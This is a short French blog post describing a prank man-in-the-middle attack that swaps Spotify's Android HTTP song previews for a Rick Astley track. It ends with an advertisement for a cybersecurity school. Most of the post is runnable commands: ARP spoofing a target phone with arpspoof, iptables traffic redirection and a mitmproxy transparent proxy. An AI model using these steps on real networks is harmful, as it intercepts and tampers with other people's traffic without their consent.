Rickroller Spotify !
Saviez-vous que l’application Spotify sous Android streamait les premières secondes d’une chanson en HTTP ? Et alors me direz-vous ?
Et alors si vous êtes sur le même réseau qu’un ami ou un collègue qui utilise Spotify sur son smartphone Android, vous allez pouvoir le rickroller !!
Comment ?
Et bien grâce à une petite attaque de type Man In The Middle, qui va vous permettre de lui streamer la chanson de Rick Ashley au format OGG. Attention, pour que cela fonctionne, vous devez être en IPv4 et que votre “victime” n’ait pas déjà la chanson qu’il écoute dans le cache de Spotify.
Installez dsniff suivi d’un proxy mitm :
apt-get install dsniff
pip install mitmproxy
Puis redirigez le trafic HTTP vers le port 8080 :
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -I PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080
Ensuite, identifiez l’IP du téléphone Android, l’IP de la passerelle et lancez un ARP Spoof comme ceci :
arpspoof -t [target ip] [gateway ip]
# Exemple : arpspoof -t 192.168.1.101 192.168.1.1
Chopez ensuite un morceau au format OGG, précisez son nom à la ligne 3 du fichier python rickroll.py que vous pouvez télécharger ici. Et lancez la commande suivante qui mettra en place un proxy transparent sur le port 8080 qui interceptera les requêtes HTTP en direction du domaine heads-akp.spotify.com.edgesuite.net.
Et en avant le rick roll ! Oui c’est clairement se faire chier pour pas grand-chose, mais je sais que vous êtes joueur.
mitmproxy -T -p 8080 -s rickroll.py -i “heads-akp.spotify.com.edgesuite.net”
Entièrement dédiée à la cybersécurité, l'école Guardia est accessible soit directement après le bac (post-bac), soit après un bac+2 ou bac+3. En rejoignant l'école Guardia, vous deviendrez développeur informatique option cybersécurité (Bac+3) ou expert en cybersécurité (Bac+5).